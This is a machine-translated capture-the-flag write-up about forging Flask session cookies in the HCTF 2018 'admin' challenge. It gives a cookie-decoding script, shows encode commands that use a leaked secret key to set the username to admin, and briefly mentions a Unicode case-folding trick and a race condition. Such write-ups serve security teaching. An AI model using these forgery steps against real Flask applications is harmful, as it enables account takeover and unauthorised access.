Flask session forged hctf admin

Knowledge point ：

flask Of session It's stored on the client side cookie Medium , and flask Only the data is signed . It is well known that , Signature is tamper proof , And cannot be prevented from being read . and flask No encryption operation is provided , So its session All the contents of can be read on the client . Still some session It is stored in the database or in the file of the server .

About only admin To read flag The subject of , We can fake it session To achieve identity forgery ;

Steps are as follows ：

There must be a forged code ： Download address ：https://github.com/noraj/flask-session-cookie-manager

1. First get the website session value ,F12 cookie Get... Inside , And then session To decrypt ： Decrypt a lot of scripts online ; What I have here is ：

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

The code can be placed from https://github.com/noraj/flask-session-cookie-manager Downloaded session Forge encrypted code files to match cmd Use

Usage method ：python session Decrypt .py session value

for example ：

>python session Decrypt .py eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.XyZ3Vw.OcD3-l1yOcq8vlg8g4Ww3FxrhVs

result ：

 2. Will decrypt the obtained session To forge , Forgery requires a key , So we need to find its key to forge ： Generally, it is forged admin, Just change the user name to admin

Usage method ： The flask Forge encryption and decryption , What is commonly used here is encode ,

sentence ： python flask_session_cookie_manager3.py encode -s " secret key " -t "session Decryption result （ After changing the user name ）"

for example

python flask_session_cookie_manager3.py encode -s "woshicaiji" -t "{'username': b'admin'}"

3. Will be forged session Re input cookie;

HCTF admin For example ：

First of all, we can register an account and password randomly , You can get tips in the source code of the password change interface , The useful source code is in the prompt ;

The source code of this problem needs to be found in the tips given , Refer to others for specific process wp, Anyway, after getting the download path, first look at the route route Although there is nothing in this problem ;

Reference resources ：BUUCTF [HCTF 2018]admin 1_wow Xiaohua's blog -CSDN Blog

1.session Copy down ： Decrypt session;

python session Decrypt .py .eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAgnACI7ieq-71NQjG8PwFEfNsnQ.YsLkGA.-IhgD3h5Rju-WwMa4YbLJO69j6I

obtain ：

{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': '123', 'user_id': '10'}

Will be one of the name value 123 Change it to admin after forge ;

The key here is config.py in ;

2. Direct forgery ：

python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"

python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"

  result ：

.eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAtqWrTzCC67nqXn-DYAzPX_3EbhA.YsLnVA.f91nHdCGekSIwqWqz9T9cba5tkA

3. Re enter the above results cookie Medium session , Refresh ; You can see flag;

This problem passed the code audit , You can also see a function vulnerability ：

Unicode cheating

strlower() Leading to deception , Reference resources

HCTFadmin-- About flasksession Forgery and unicode The deception of _Z3eyOnd The blog of -CSDN Blog

That is, through query Unicode Special code for , for instance A Yes. ᴬ , If we register ᴬdmin , The function will put ᴬ It can be interpreted as A; If you change your password or log in again, you will A It can be interpreted as a; So as to achieve the goal ;

There is also conditional competition ; Refer to the link above ;